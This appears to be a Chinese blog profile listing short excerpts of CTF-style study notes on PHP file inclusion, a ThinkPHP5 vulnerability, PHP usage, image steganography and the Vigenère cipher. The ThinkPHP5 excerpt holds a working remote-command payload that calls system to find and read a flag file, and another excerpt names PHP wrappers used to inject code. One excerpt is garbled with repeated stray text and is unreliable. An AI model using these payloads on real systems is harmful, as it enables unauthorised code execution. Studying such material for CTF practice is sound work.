- 博客(6)
- 收藏
- 关注
RSS订阅原创 文件包含漏洞(一)
1.造成文件包含漏洞的函数通常有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readline 2.data协议 用法: data://text/plain,xxxx(要执行的php代码) data://text/plain;base64,xxxx(base64编码后的数据) 3.php://协议 php://input,用于执行php代码,需要post请
2021-01-15 20:12:05
307
原创 php一些函数
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
2021-01-15 18:57:17
437
原创 thinkphp5的漏洞
payload: s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪 s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看fla
2021-01-15 16:41:42
495
原创 php运行方式
php运行方式 运行php文件 php -f 路径+文件名 或者 php 路径+文件名 (小技巧:windows下面可以把文件直接拖进去,省去cd/命令,或者慢慢拼写完整路径) 两种方法都可以执行命令,如果是.php文件则执行php代码,否则直接以字符串形式读取文件 或者直接用php.exe 或者在cmd下php -a 如果想要在本地测试可以先把文件放入www目录下,登录127.0.0.1/xx.php 以下就是我所了解几种可以运行php的方法 ...
2021-01-07 15:08:01
496
原创 cloacked-pixel隐写
cloacked-pixel隐写,以月赛中的一道题为例,密码zaqqaz,得到一张图片,是cloacked-pixel隐写,使用方法如下。 cloacked-pixel安装 解压cloacked-pixel-master.zip到虚拟机 cloacked-pixel使用 加密: python lsb.py hide big.png 1.txt 123456 ps: hide:表示加密模式; big.png:待加密的png图片; 1.txt:存放payload; 123456:加密的密码 解密: pytho
2021-01-06 17:26:28
7241
1
原创 维吉尼亚密码
维吉尼亚密码是在凯撒密码基础上产生的一种加密方法,它将凯撒密码的全部25种位移排序为一张表,与原字母序列共同组成26行及26列的字母表。另外,维吉尼亚密码必须有一个密钥,这个密钥由字母组成,最少一个,最多可与明文字母数量相等。维吉尼亚密码加密方法示例如下: 明文:I’ve got it. 密钥:ok 密文:W’fs qcd wd. 首先,密钥长度需要与明文长度相同,如果少于明文长度,则重复拼接直到相同。本例中,明文长度为8个字母(非字母均被忽略),密钥会被程序补全为“okokokok”。现在根据如下维吉尼亚
2020-12-29 17:33:53
897
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人